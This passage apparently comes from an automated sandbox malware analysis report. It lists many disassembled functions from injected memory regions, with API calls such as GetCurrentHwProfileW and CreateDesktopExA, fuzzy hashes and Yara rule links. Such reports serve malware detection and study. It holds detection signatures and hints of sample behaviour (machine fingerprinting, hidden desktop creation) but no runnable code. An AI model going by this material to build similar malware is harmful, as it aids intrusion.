                                                                                                                      • Instruction Fuzzy Hash: 7421F9EB30C135BDB142B54B1750AFA666DE6E633073080E6B60BC5601F3C42E893571
                                                                                                                      Function 04BE07C5 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 286 4be07c5-4be07cb 287 4be07cc-4be0849 286->287 288 4be075a-4be07b6 286->288 299 4be0856-4be086c GetCurrentHwProfileW 287->299 288->287 301 4be087c-4be09ba call 4be09be 299->301
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 76fea9a5f170465c3d3f37e94e5d1932cd5314f66568c2c61c0b26273b547b79
                                                                                                                      • Instruction ID: 979e96f26b7c32f9bd8e1df4ac559d92131766189c77f75c59adf0297b769441
                                                                                                                      • Opcode Fuzzy Hash: 76fea9a5f170465c3d3f37e94e5d1932cd5314f66568c2c61c0b26273b547b79
                                                                                                                      • Instruction Fuzzy Hash: 6821D7EB70C139BD7142B94B5B50AFA666DE6E673073080E6B60BC6601F3D42E863571
                                                                                                                      Function 04BE075E Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 319 4be075e-4be0849 331 4be0856-4be086c GetCurrentHwProfileW 319->331 333 4be087c-4be09ba call 4be09be 331->333
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: a12cde6c04491e6320927a6d977f9b37632c0ce44bedc674de8f4c9fdb7e552e
                                                                                                                      • Instruction ID: d612d8b21246ff519642f2e810694b8828ca92f788d2c3626faec704da90a703
                                                                                                                      • Opcode Fuzzy Hash: a12cde6c04491e6320927a6d977f9b37632c0ce44bedc674de8f4c9fdb7e552e
                                                                                                                      • Instruction Fuzzy Hash: 0621E7EB70C139BD7142B54B5750AFA676DE6EA33073080E6B60BC5601F7C42E8A35B1
                                                                                                                      Function 04BD0C1C Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 351 4bd0c1c-4bd0c26 353 4bd0c28-4bd0c6e 351->353 354 4bd0c07 351->354 359 4bd0c7e-4bd0ccb 353->359 354->351 363 4bd0cd3-4bd0cd5 359->363 364 4bd0cce call 4bd0ce5 359->364 365 4bd0cd7-4bd0d95 363->365 366 4bd0c70-4bd0c78 363->366 364->363 374 4bd0d9f-4bd0db0 CreateDesktopExA 365->374 366->359 375 4bd0dc7-4bd0dcc 374->375
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 0fae049c4bb9844041d95da0694e9d670f95269011e53e976ff0b381a0775a5d
                                                                                                                      • Instruction ID: 4814117d9a8d0fac26269863bb635ead0163f93d3aff8dbd4a566dab02d8f26a
                                                                                                                      • Opcode Fuzzy Hash: 0fae049c4bb9844041d95da0694e9d670f95269011e53e976ff0b381a0775a5d
                                                                                                                      • Instruction Fuzzy Hash: C12133AB289104BDE50229951B14BFA7E2EF787338F3445E3F81386582F3E166597020
                                                                                                                      Function 04BD0C62 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 376 4bd0c62-4bd0c89 377 4bd0c8b-4bd0c8d 376->377 378 4bd0cd7-4bd0d95 376->378 379 4bd0c8e-4bd0ccb 377->379 393 4bd0d9f-4bd0db0 CreateDesktopExA 378->393 385 4bd0cd3-4bd0cd5 379->385 386 4bd0cce call 4bd0ce5 379->386 385->378 389 4bd0c70-4bd0c81 385->389 386->385 389->379 394 4bd0dc7-4bd0dcc 393->394
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 3bef0872c8acdc1afd3942da5016db6f85004d798aa88bf0465e2eca9d79eb34
                                                                                                                      • Instruction ID: 668993783519e21381cbd08c4eab45545feb15bfe1393871961337859978c9d3
                                                                                                                      • Opcode Fuzzy Hash: 3bef0872c8acdc1afd3942da5016db6f85004d798aa88bf0465e2eca9d79eb34
                                                                                                                      • Instruction Fuzzy Hash: F62179A728D244BEA20366940F146F67F2EF783734B3045D3F80386483F3A526597131
                                                                                                                      Function 04BE079D Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 395 4be079d-4be0849 404 4be0856-4be086c GetCurrentHwProfileW 395->404 406 4be087c-4be09ba call 4be09be 404->406
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 0a72184b0eb2a5f7315430f280a275e63baec7d3702d5e9b17b4bd40cfa654af
                                                                                                                      • Instruction ID: 37162760f162875438aa761048ba46b6039a80a96edb75c555a4f027254de35e
                                                                                                                      • Opcode Fuzzy Hash: 0a72184b0eb2a5f7315430f280a275e63baec7d3702d5e9b17b4bd40cfa654af
                                                                                                                      • Instruction Fuzzy Hash: 5A21E7EB70C139BD7142B5475B50AFA666DE6EA33073080E6B607C6601F3D41A8635B1
                                                                                                                      Function 04BE078B Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 424 4be078b-4be0849 434 4be0856-4be086c GetCurrentHwProfileW 424->434 436 4be087c-4be09ba call 4be09be 434->436
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 594f8bb7bc2ebe8d59973a13fa792b4ecec3ab9590e6daeba726cbf141a74f5e
                                                                                                                      • Instruction ID: a354132f47817650168901b457d6dc8432250b173406a249b6b342acd47ad1da
                                                                                                                      • Opcode Fuzzy Hash: 594f8bb7bc2ebe8d59973a13fa792b4ecec3ab9590e6daeba726cbf141a74f5e
                                                                                                                      • Instruction Fuzzy Hash: 50212BEB70C139BD7142B54B1B50AFA666DE6EA33073080E6B707C6601F3C42E8635B1
                                                                                                                      Function 04BE0808 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 454 4be0808-4be0812 455 4be07d7-4be0803 454->455 456 4be0814-4be0815 454->456 460 4be081c-4be0849 455->460 458 4be0817-4be0819 456->458 459 4be07d5-4be07d6 456->459 458->460 459->455 463 4be0856-4be086c GetCurrentHwProfileW 460->463 465 4be087c-4be09ba call 4be09be 463->465
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 256fb3f7fb67d8edb3a20de7114c97c3cd0f24ae4ce54631347b2649db6ca01f
                                                                                                                      • Instruction ID: 9a1311dbf53f71c5b87c616f017ac0b61937b72fa733d70cef7b4abb53a3326e
                                                                                                                      • Opcode Fuzzy Hash: 256fb3f7fb67d8edb3a20de7114c97c3cd0f24ae4ce54631347b2649db6ca01f
                                                                                                                      • Instruction Fuzzy Hash: 3C212CEB30C135AD7542B95727506FA676DE6E633073084E6F60BC5A01F3C42E8635B1
                                                                                                                      Function 04BD0C3B Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f4c28ec34077da26ac1e40e0eae00fa5a506e0eac16f27ed41a03e09be423843
                                                                                                                      • Instruction ID: cdc9954e629f78810784d6ff5bc024f00c9654c15f7472d52840c7dc2c91473e
                                                                                                                      • Opcode Fuzzy Hash: f4c28ec34077da26ac1e40e0eae00fa5a506e0eac16f27ed41a03e09be423843
                                                                                                                      • Instruction Fuzzy Hash: B72135EB289204BDE50229851B14BF67E2FF7C7738F3081E2F81356542B3E5665D3061
                                                                                                                      Function 04BD0C40 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 2aad0df49170f85dccefa6d20e226a86bb83fa2b131c7fd66086ac421b4f06e1
                                                                                                                      • Instruction ID: 26501ebac22c3564146c6c1f662217d5d05fc93fb7bd62c131a2201cade78024
                                                                                                                      • Opcode Fuzzy Hash: 2aad0df49170f85dccefa6d20e226a86bb83fa2b131c7fd66086ac421b4f06e1
                                                                                                                      • Instruction Fuzzy Hash: 8F2135AB288104BCE5022A951B14BF67E2EF797738F3485E3F80395942F3E526693170
                                                                                                                      Function 04BD0C51 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: df06e4f10b2a2db37ce508de29acbd835f999584716096c7c02a9cbea34d91ea
                                                                                                                      • Instruction ID: fad4a411cbaaae02c5261bfe6e2952f4502463f6e846fd62ecb92d0b26ede88d
                                                                                                                      • Opcode Fuzzy Hash: df06e4f10b2a2db37ce508de29acbd835f999584716096c7c02a9cbea34d91ea
                                                                                                                      • Instruction Fuzzy Hash: 662132BB289204BDE5026A851B14BF67F2EF797334F3080E7F80395542B3E126983120
                                                                                                                      Function 04BE07D1 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: fe0c4f5455889a63a7a2460b38bf75e4a8eaf2fbde02a1b2e205f676c8fa08e1
                                                                                                                      • Instruction ID: 33f0c27780abfebfd9a070024b05e06d0ea538a2827d98c9a7b8bf83c6afeff6
                                                                                                                      • Opcode Fuzzy Hash: fe0c4f5455889a63a7a2460b38bf75e4a8eaf2fbde02a1b2e205f676c8fa08e1
                                                                                                                      • Instruction Fuzzy Hash: 2E21D8EB30C135BD7142B9571750AFA666DE6EA33073080E6B60BC5601F7D42E8635B1
                                                                                                                      Function 04BD0CF0 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 79d5e910d6436926fbd98378c16875d3aaa4abf5f2e434455503a85d0d452fc9
                                                                                                                      • Instruction ID: de672619bd441425f73188c2a5c35436cedd92e7aca9bc5d104e046c81d58abc
                                                                                                                      • Opcode Fuzzy Hash: 79d5e910d6436926fbd98378c16875d3aaa4abf5f2e434455503a85d0d452fc9
                                                                                                                      • Instruction Fuzzy Hash: DA1129AB249214BDA9037A911B045F67F2EF6C7738B3085D7FC1394452F3A46A5E7131
                                                                                                                      Function 04BE07F7 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 379de5d25da4bde111fc2e8dd5d60b75386253c78627425e544840beb27ea0eb
                                                                                                                      • Instruction ID: 68b7851acf2689896f263e0f6b0de6ee122d79feec4bfd712a86d9a076f42090
                                                                                                                      • Opcode Fuzzy Hash: 379de5d25da4bde111fc2e8dd5d60b75386253c78627425e544840beb27ea0eb
                                                                                                                      • Instruction Fuzzy Hash: 05112BEB70C139EDB1427D5B5A506FA666DE7FA33073081E6A30B95601F3D02A8635A1
                                                                                                                      Function 04BD0CB0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: a1c3aa203b8a3c32b20db3234e96a265f1599e312f6bb17da1444a117cd3d9d8
                                                                                                                      • Instruction ID: 810043a2a4cf4495e5c98bbb4bc17468cc0631e38dd47613f5649c558c823e51
                                                                                                                      • Opcode Fuzzy Hash: a1c3aa203b8a3c32b20db3234e96a265f1599e312f6bb17da1444a117cd3d9d8
                                                                                                                      • Instruction Fuzzy Hash: 900145EB248104BDA50269951B14AFA6B2EF7D7738B3085E3FC1394582B3E56A5C7030
                                                                                                                      Function 04BD0CBE Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 53aeec2c5906a90cb540f6da5a0ea011eaaf1e79548d6ed8c2eb762f3c605f1f
                                                                                                                      • Instruction ID: f762e41baedd877f590a355637056aa095bfdc55317ea5c912db082e2bc5d42f
                                                                                                                      • Opcode Fuzzy Hash: 53aeec2c5906a90cb540f6da5a0ea011eaaf1e79548d6ed8c2eb762f3c605f1f
                                                                                                                      • Instruction Fuzzy Hash: D001F1EB248104BDA50269951B08AFABA2EF7D7738B3085E7FC1394442B3A46A5D7031
                                                                                                                      Function 04BE0834 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 108ad66a2b89d08008a3662bffbf0f8b72317aa245ffd33d87a94f8cfc23adc6
                                                                                                                      • Instruction ID: f4fb9d9c7974b373e7a8959a29a722f2b79fca7fad6fea64f760887101c42aec
                                                                                                                      • Opcode Fuzzy Hash: 108ad66a2b89d08008a3662bffbf0f8b72317aa245ffd33d87a94f8cfc23adc6
                                                                                                                      • Instruction Fuzzy Hash: DE1180BB70D139EDB241B95B16506F96629E6F737073081F5A30B95601F3C02A863691
                                                                                                                      Function 04BD0D09 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 7b52450097dd0efe9f86d1279de34e15c5bc6a3edd6c3ba916280da871a830fc
                                                                                                                      • Instruction ID: 7c3ecb1daf3b2ba9957fc99fe8b2beab862a3ccff0067bd295d7d03def3b4a4e
                                                                                                                      • Opcode Fuzzy Hash: 7b52450097dd0efe9f86d1279de34e15c5bc6a3edd6c3ba916280da871a830fc
                                                                                                                      • Instruction Fuzzy Hash: DB01E1AA24C2417EE6035A951A585FA7F2EE9C323473548EBFC13D5843F395261EB232
                                                                                                                      Function 04BE085E Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 26b12a9cb62d708db9820e58de39a3f33fadc3240c76bc437493f9585cdf7ea0
                                                                                                                      • Instruction ID: aaaae279b992ce40585c644d46298f40c139689cc84339765ece675067d02367
                                                                                                                      • Opcode Fuzzy Hash: 26b12a9cb62d708db9820e58de39a3f33fadc3240c76bc437493f9585cdf7ea0
                                                                                                                      • Instruction Fuzzy Hash: 1C118CAB70C139EDB141B95B02506F9222DE7FA370B3081D2A30BC5600F7D02B823591
                                                                                                                      Function 04BE084E Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 8c4b2dacf463f637fd6e36e394fca45aab8addf6dec9412e4c96abf24eae17e2
                                                                                                                      • Instruction ID: d3f53d0709edc1ea0b8674ea5cd802eeeb248affda8b56f4f1765c45b549d54a
                                                                                                                      • Opcode Fuzzy Hash: 8c4b2dacf463f637fd6e36e394fca45aab8addf6dec9412e4c96abf24eae17e2
                                                                                                                      • Instruction Fuzzy Hash: BC01AFFA70C239ED72417E5B42906FA226AE7FB33072081E5630B85605F7D02A813591
                                                                                                                      Function 04BD0D5E Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: b5be91bc65f6997cb1f93c8de064b19ea59887375d06e65244e6fee80fa36276
                                                                                                                      • Instruction ID: fbe15e1c0c9dac2b3f10996a19cbcfcb0bb5d881185541ccd524970bc4e6d106
                                                                                                                      • Opcode Fuzzy Hash: b5be91bc65f6997cb1f93c8de064b19ea59887375d06e65244e6fee80fa36276
                                                                                                                      • Instruction Fuzzy Hash: 3AF05EDB2482507DA502719567149FA6A2EE5D333873484EBF80385903F2D52A59B031
                                                                                                                      Function 04BD0D43 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 758f927f292a8b8243a6f4228f708cb2aae1e23000b9deb64e571e48da1f453f
                                                                                                                      • Instruction ID: 169b6b80da7cdde25cdca09c4b6e9a83c53e93f50dcdd74a0f6fa78e89636207
                                                                                                                      • Opcode Fuzzy Hash: 758f927f292a8b8243a6f4228f708cb2aae1e23000b9deb64e571e48da1f453f
                                                                                                                      • Instruction Fuzzy Hash: BAF05EAB288204BEA552A9D557089FA7B6EF6D3334B3084A7F80380802F3D56A497131
                                                                                                                      Function 04BD0D6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: bf473d14fce6d831c7017eba0e97b5b7d31fb42c533c690974c9ce3959563ac7
                                                                                                                      • Instruction ID: cc5c873c9b4c9772b17e059c9a2bd3dcd369afd33f12bb6a313a7fd2c8485f14
                                                                                                                      • Opcode Fuzzy Hash: bf473d14fce6d831c7017eba0e97b5b7d31fb42c533c690974c9ce3959563ac7
                                                                                                                      • Instruction Fuzzy Hash: 2EE01AEB2881147C7102A5C62B18AFA6A2EF1D777437184A7F803D6807B3D65A5D3031
                                                                                                                      Function 04BD0D71 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 82d48021ce53ac05e40a6ba654139cf15c33c34f17a36b88e0d09a84f53fcc58
                                                                                                                      • Instruction ID: b8d8f9aeb5474c0d320a7599af5064f8a8e0ac8b23ebe4b82725ab1bcea1b31f
                                                                                                                      • Opcode Fuzzy Hash: 82d48021ce53ac05e40a6ba654139cf15c33c34f17a36b88e0d09a84f53fcc58
                                                                                                                      • Instruction Fuzzy Hash: 81E01AEB2881147CB4069AD66B189FAAB2EF1D37343748867F803D0803F3D65A5D3531
                                                                                                                      Function 04BD0D9A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
